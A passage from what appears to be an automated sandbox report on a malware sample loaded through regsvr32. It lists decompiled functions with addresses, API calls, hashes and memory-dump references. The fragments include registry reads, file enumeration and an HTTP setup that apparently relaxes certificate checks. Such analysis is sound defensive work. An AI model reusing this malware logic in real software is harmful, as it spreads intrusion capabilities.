Part of subcall function 007A6DB7: wsprintfA.USER32 ref: 007A6EBA

RtlFreeHeap.NTDLL(00000000,007A1C1F,?,?,007A1C1F,?), ref: 007A24FD

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 5b5fffa4f51003bc7203518ae411975877c04dff1f255ba6af1e8194ae8618d6
Instruction ID: 0355a9ac04169ed28aeec9a96a5232c325d743233d5b3e6d3339e8f666ab674c
Opcode Fuzzy Hash: 5b5fffa4f51003bc7203518ae411975877c04dff1f255ba6af1e8194ae8618d6
Instruction Fuzzy Hash: AF311A75900109EFCB01DF68DD44ADA3BB8FBCA350F108122F90597252E7799965CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DB81A, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6D4DB867

Part of subcall function 6D4DC084: RtlInitializeSListHead.NTDLL(6D51A9E0), ref: 6D4DC089

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D4DB8D1
___scrt_fastfail.LIBCMT ref: 6D4DB91B

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 2a0d6fbdc72065d054ee6f895387a690ab9989899cec32a675fa35a34e260e30
Instruction ID: 75dadfaac4119e30d6773af1a4495721f51c7a59a16c647c2f7124e5e21e4ed3
Opcode Fuzzy Hash: 2a0d6fbdc72065d054ee6f895387a690ab9989899cec32a675fa35a34e260e30
Instruction Fuzzy Hash: 0B21C032649246AEEF81EFF4D831FAD77709F4636DF22405DEA9067282CB220C469695

Uniqueness

Uniqueness Score: -1.00%

Function 007A274E, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E007A274E(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0x7aa380;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E007A4E9C(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E007A33FA(_t19);
					if(_t20 == 0) {
						HeapFree( *0x7aa290, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0x7aa388; // 0x52998b0
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x007a2755
0x007a275c
0x007a275f
0x007a2766
0x007a276b
0x007a276d
0x007a2774
0x007a277b
0x00000000
0x00000000
0x007a277d
0x007a2782
0x007a2783
0x007a278a
0x007a27a4
0x00000000
0x007a278c
0x007a278c
0x007a278e
0x007a2791
0x007a2795
0x00000000
0x00000000
0x007a2797
0x007a2795
0x007a27ae
0x007a27b0
0x007a27b6
0x007a27b8
0x007a27be
0x007a27c5
0x007a27d5
0x007a27cd
0x007a27d0
0x007a27d0
0x007a27d8
0x007a27d8
0x007a27e2
0x007a27e2
0x007a27aa
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 007A276B

Part of subcall function 007A4E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,007AA380), ref: 007A4EC7
Part of subcall function 007A4E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 007A4EE9
Part of subcall function 007A4E9C: memset.NTDLL ref: 007A4F03
Part of subcall function 007A4E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 007A4F41
Part of subcall function 007A4E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 007A4F55
Part of subcall function 007A4E9C: FindCloseChangeNotification.KERNELBASE(?), ref: 007A4F6C
Part of subcall function 007A4E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 007A4F78
Part of subcall function 007A4E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 007A4FB9
Part of subcall function 007A4E9C: FindFirstFileA.KERNELBASE(?,?), ref: 007A4FCF

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 007A27B0

Part of subcall function 007A33FA: lstrlen.KERNEL32(?,007AA380,73BB7FC0,00000000,007A2788,?,?,?,?,?,007A3EAC,?), ref: 007A3403
Part of subcall function 007A33FA: mbstowcs.NTDLL ref: 007A342A
Part of subcall function 007A33FA: memset.NTDLL ref: 007A343C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,007A3EAC,?), ref: 007A27A4

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 1489712272-0
Opcode ID: c221c5ee3ae810481ddeaca8ce523283a336af74d590d7a5a40b9a209e24e62c
Instruction ID: ff3d9ca5e5e5bbcdaebba245bcf18784150fed13639d4d5f9932b5019fff0e2c
Opcode Fuzzy Hash: c221c5ee3ae810481ddeaca8ce523283a336af74d590d7a5a40b9a209e24e62c
Instruction Fuzzy Hash: 2711E535600208EBEB009BA9CC84BA977A9EBC6365F204121F601D6091D37D9E82DB25

Uniqueness

Uniqueness Score: -1.00%

Function 007A779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A779E(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x7aa2d0; // 0x4aed5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x7aba60; // 0x4f0053
				_v16 = 4;
				_t31 = E007A4C7C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x7aa2d0; // 0x4aed5a8
					_t5 = _t19 + 0x7ababc; // 0x6e0049
					_t34 = E007A4C7C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E007A2A03(_t34);
					}
					E007A2A03(_t31);
				}
				return _v8;
			}

0x007a77a4
0x007a77a9
0x007a77ae
0x007a77b5
0x007a77c1
0x007a77c5
0x007a77c7
0x007a77cd
0x007a77d9
0x007a77dd
0x007a77f0
0x007a77f8
0x007a780c
0x007a7814
0x007a7816
0x007a7816
0x007a781d
0x007a781d
0x007a7824
0x007a7824
0x007a782a
0x007a782f
0x007a7835

APIs

Part of subcall function 007A4C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,007A77C1,004F0053,00000000,?), ref: 007A4C85
Part of subcall function 007A4C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,007A77C1,004F0053,00000000,?), ref: 007A4CAF
Part of subcall function 007A4C7C: memset.NTDLL ref: 007A4CC3

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 007A77F0
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 007A780C
RegCloseKey.ADVAPI32(00000000), ref: 007A781D

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 4de6ffe2ddd80e134422fcb32939363814f784d5277b1ab3010710114ebe9353
Instruction ID: 57af3357b477b671d5bd7d83fa6ed252684022a862df267243499c0286bf4b22
Opcode Fuzzy Hash: 4de6ffe2ddd80e134422fcb32939363814f784d5277b1ab3010710114ebe9353
Instruction Fuzzy Hash: 95110972504209FBDB11DBE8DC89FAEB7BCAB86701F108159A611A6062E77C9A04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 007A1896, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A1896(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* __ebx;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				void* _t52;
				int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t52 = __edx;
				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t54 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E007A5C4E(_t54);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x7aa320, 0x110);
					_t27 =  *0x7aa324; // 0x0
					_t58 = _t57 + 0xc;
					if(_t27 != 0) {
						E007A75D7(_t46, _a4, 0x110, _t27, 0);
					}
					if(E007A4581( &_v36) != 0) {
						_t35 = E007A35A1(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t56 = _v20;
							_v36 =  *_t46;
							_v16 = E007A421A(_t56, _a8, _t52, _t46, _a12);
							 *(_t56 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t56, 0, _v12 - ( *_t20 & 0xf));
							_t58 = _t58 + 0xc;
							E007A2A03(_t56);
						}
					}
					memset(_a4, 0, _t54);
					E007A2A03(_a4);
				}
				return _v16;
			}

0x007a1896
0x007a189c
0x007a18a1
0x007a18ae
0x007a18b1
0x007a18b4
0x007a18bb
0x007a18be
0x007a18cc
0x007a18d1
0x007a18d6
0x007a18db
0x007a18e6
0x007a18e6
0x007a18f5
0x007a190a
0x007a1911
0x007a1918
0x007a191e
0x007a192c
0x007a1932
0x007a1935
0x007a1942
0x007a1947
0x007a194b
0x007a194b
0x007a1911
0x007a1956
0x007a1961
0x007a1961
0x007a196d

APIs

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

memcpy.NTDLL(00000000,00000110,007A1C1F,007A1C1F,?,?,007A1C1F,?,?,007A24E4,?), ref: 007A18CC
memset.NTDLL ref: 007A1942
memset.NTDLL ref: 007A1956

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 70c375520278c26163e3a1961aabf4d2f7e1112933360667597720a7ab5e39b8
Instruction ID: 19a52da4301d32202c18974778527c7fb91c6a6194cfd0d357ecad118cde4d55
Opcode Fuzzy Hash: 70c375520278c26163e3a1961aabf4d2f7e1112933360667597720a7ab5e39b8
Instruction Fuzzy Hash: 86217F71E00218BBDF11AF69CC55FEEBBB8AF8A350F044115F904E6252D738DA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007A11C3, Relevance: 3.1, APIs: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E007A11C3(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				long _t39;
				long _t40;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				void* _t67;
				intOrPtr* _t69;
				intOrPtr* _t70;
				void* _t73;

				_t70 = __esi;
				_t67 = E007A33FA(0, _a4);
				if(_t67 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t73 = _t40 - 6;
					if(_t73 > 0 || _t73 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t67, _a4, 0, 0, 0); // executed
					 *(_t70 + 0x10) = _t40;
					E007A2A03(_t67);
					if( *(_t70 + 0x10) == 0) {
						goto L18;
					} else {
						_t43 = E007A33FA(0,  *_t70);
						_v8 = _t43;
						if(_t43 == 0) {
							goto L18;
						} else {
							_t69 = __imp__; // 0x6f4df5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t70 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t70 + 0x14)) = _t43;
								E007A2A03(_v8);
								if( *((intOrPtr*)(_t70 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t46 = E007A33FA(0,  *((intOrPtr*)(_t70 + 4)));
									_v8 = _t46;
									if(_t46 == 0) {
										goto L18;
									} else {
										_t47 =  *0x7aa2d0; // 0x4aed5a8
										_t21 = _t47 + 0x7ab76c; // 0x450047
										_t48 = _t21;
										__imp__( *((intOrPtr*)(_t70 + 0x14)), _t48, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t70 + 0x18)) = _t48;
										E007A2A03(_v8);
										_t50 =  *((intOrPtr*)(_t70 + 0x18));
										if(_t50 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t50, 0x1f,  &_a4,  &_v12);
											if(_t50 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t69( *((intOrPtr*)(_t70 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t70 + 0x18)));
											if( *_t69() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t70 + 0x18)));
												if( *_t69() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t43 =  *_t69( *(_t70 + 0x10), 3,  &_a8, 4);
								if(_t43 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}

0x007a11c3
0x007a11d4
0x007a11da
0x007a1314
0x007a1314
0x007a11e0
0x007a11e0
0x007a11e6
0x007a11e8
0x007a11f6
0x007a11f1
0x007a11f1
0x007a11f1
0x007a1204
0x007a120b
0x007a120e
0x007a1216
0x00000000
0x007a121c
0x007a1220
0x007a1227
0x007a122a
0x00000000
0x007a1230
0x007a1233
0x007a1239
0x007a1250
0x007a1259
0x007a1262
0x007a1265
0x007a126d
0x00000000
0x007a1273
0x007a127d
0x007a1280
0x007a1289
0x007a128c
0x00000000
0x007a1292
0x007a1295
0x007a12a0
0x007a12a0
0x007a12aa
0x007a12b3
0x007a12b6
0x007a12bb
0x007a12c0
0x00000000
0x007a12c2
0x007a12cd
0x007a12d4
0x007a12dc
0x007a12de
0x007a12ec
0x007a12ec
0x007a12ee
0x007a12f3
0x007a12f4
0x007a12f6
0x007a12fd
0x00000000
0x007a12ff
0x007a12ff
0x007a1304
0x007a1305
0x007a1307
0x007a130e
0x00000000
0x007a1310
0x007a1310
0x007a1310
0x007a130e
0x007a12fd
0x007a12c0
0x007a128c
0x007a123b
0x007a1246
0x007a124a
0x00000000
0x00000000
0x00000000
0x00000000
0x007a124a
0x007a1239
0x007a122a
0x007a1216
0x007a131d

APIs

Part of subcall function 007A33FA: lstrlen.KERNEL32(?,007AA380,73BB7FC0,00000000,007A2788,?,?,?,?,?,007A3EAC,?), ref: 007A3403
Part of subcall function 007A33FA: mbstowcs.NTDLL ref: 007A342A
Part of subcall function 007A33FA: memset.NTDLL ref: 007A343C

GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,007A572C,73BB81D0,00000000,05299698,?,?,007A3B82,?,05299698,0000EA60), ref: 007A11E0
GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,007A572C,73BB81D0,00000000,05299698,?,?,007A3B82,?,05299698,0000EA60), ref: 007A1314

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: ErrorLastVersionlstrlenmbstowcsmemset
String ID:
API String ID: 4097109750-0
Opcode ID: cdd534214d28016b11ff6bf31622f6efd634d2276e402215ff00768aae451591
Instruction ID: 6b651096bfdad06951e58539d17918e9595f30c67d9dbbddb9e1a879f04c4359
Opcode Fuzzy Hash: cdd534214d28016b11ff6bf31622f6efd634d2276e402215ff00768aae451591
Instruction Fuzzy Hash: 39418F71500209FFEF209FA4CC89EAA7BB8EB85740F40862DF702C64A1D778DA45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 007A41D0, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x7aa294) == 0) {
						E007A1547();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x7aa294) == 1) {
						_t10 = E007A4430(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x007a41d7
0x007a41d8
0x007a41db
0x007a420d
0x007a420f
0x007a420f
0x007a41dd
0x007a41de
0x007a41f3
0x007a41fa
0x007a41fc
0x007a41fc
0x007a41fa
0x007a41de
0x007a4217

APIs

InterlockedIncrement.KERNEL32(007AA294), ref: 007A41E5

Part of subcall function 007A4430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 007A4445

InterlockedDecrement.KERNEL32(007AA294), ref: 007A4205

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: c785c3835698e6c604bd4c8474a1267b91d5d949fd29d21dee048b75a8af965b
Instruction ID: 44cd8b5a756544ba6b07438199b6dc9769f46ff26456b2b5d433863422452498
Opcode Fuzzy Hash: c785c3835698e6c604bd4c8474a1267b91d5d949fd29d21dee048b75a8af965b
Instruction Fuzzy Hash: D3E04F31284122A7962517689C08B9FA760BFD3B84F204324B549D50D1D7AECC61C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 007A6CAF, Relevance: 2.6, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E007A6CAF(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6f4de700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}

0x007a6cb6
0x007a6cc3
0x007a6cc5
0x007a6cc8
0x007a6d0d
0x007a6d15
0x007a6d1b
0x007a6d1f
0x00000000
0x00000000
0x007a6ccc
0x007a6cd7
0x007a6cda
0x007a6d0b
0x00000000
0x00000000
0x007a6cdc
0x007a6cdf
0x007a6ce6
0x007a6cea
0x007a6cf3
0x007a6cfb
0x007a6d29
0x007a6cfd
0x007a6cfd
0x00000000
0x007a6cfd
0x007a6cfb
0x007a6ce6
0x007a6d2c
0x007a6d33
0x007a6d33
0x00000000

APIs

GetLastError.KERNEL32 ref: 007A6CCC
GetLastError.KERNEL32 ref: 007A6D23

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d100fb290c4f9a4601ba0399f172c7fc6af246125702b97e6d02937e9d5bad25
Instruction ID: c69f6076dd33ca51e0b1220f5f65caf47280b75107667f924cab53d7f0325df5
Opcode Fuzzy Hash: d100fb290c4f9a4601ba0399f172c7fc6af246125702b97e6d02937e9d5bad25
Instruction Fuzzy Hash: D9014C31A00109FBDF10AFAADD48D9FBFB9EFC6790F148166EA01E6150C7798A44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E3B21, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E06D9: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D4E071A

_free.LIBCMT ref: 6D4E3B90

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9fcfde0de3b09d8974195aacbe96f4ed24bdbebb82e85adf981dbce11935cd29
Instruction ID: 07fbcf2a0c9a30adce8e4fac96feeb01f44ca5ed14678dd34ddd4cd9ef878403
Opcode Fuzzy Hash: 9fcfde0de3b09d8974195aacbe96f4ed24bdbebb82e85adf981dbce11935cd29
Instruction Fuzzy Hash: 2A0126726083567FC321CF69D884E9AFB98EB053F2F11022DE556A76C0E7706C10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007A4BFF, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E007A4BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x7aa2d0; // 0x4aed5a8
				_t4 = _t15 + 0x7ab394; // 0x529893c
				_t20 = _t4;
				_t6 = _t15 + 0x7ab124; // 0x650047
				_t17 = E007A7471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E007A4C7C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x007a4c09
0x007a4c0b
0x007a4c12
0x007a4c13
0x007a4c14
0x007a4c15
0x007a4c1b
0x007a4c20
0x007a4c20
0x007a4c2a
0x007a4c3c
0x007a4c43
0x007a4c72
0x007a4c45
0x007a4c4a
0x007a4c6f
0x007a4c4c
0x007a4c4f
0x007a4c56
0x007a4c61
0x007a4c58
0x007a4c5b
0x007a4c5b
0x007a4c65
0x007a4c65
0x007a4c4a
0x007a4c79

APIs

Part of subcall function 007A7471: SysFreeString.OLEAUT32(?), ref: 007A7550

Part of subcall function 007A4C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,007A77C1,004F0053,00000000,?), ref: 007A4C85
Part of subcall function 007A4C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,007A77C1,004F0053,00000000,?), ref: 007A4CAF
Part of subcall function 007A4C7C: memset.NTDLL ref: 007A4CC3

SysFreeString.OLEAUT32(00000000), ref: 007A4C65

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 9477848d714d3a62a98c25ddb3499dace728698a66c6e044d17bfd45b203d2c0
Instruction ID: fa40976c20796e2fb2bc0286011f8493d89e6d5eac9b1239ea00429afd12b3cf
Opcode Fuzzy Hash: 9477848d714d3a62a98c25ddb3499dace728698a66c6e044d17bfd45b203d2c0
Instruction Fuzzy Hash: 9301B532501019FFCF109F94CC44DAEBB78FBC6720F004615EA05E7021E3B59910DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E06D9, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D4E071A

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 056c51b5185a36f06f7ca96c892a373df9f1e65d07f6b33c907681fed2780c50
Instruction ID: 93a8a99ce55b3095ce68f4d6e7e4ddc135cdbb5231a942aa6eeebea029423a22
Opcode Fuzzy Hash: 056c51b5185a36f06f7ca96c892a373df9f1e65d07f6b33c907681fed2780c50
Instruction Fuzzy Hash: 4DF0BB315495377BEF115E278C45F57375CAF817E2B258125AC34D7180DF60DC0149D1

Uniqueness

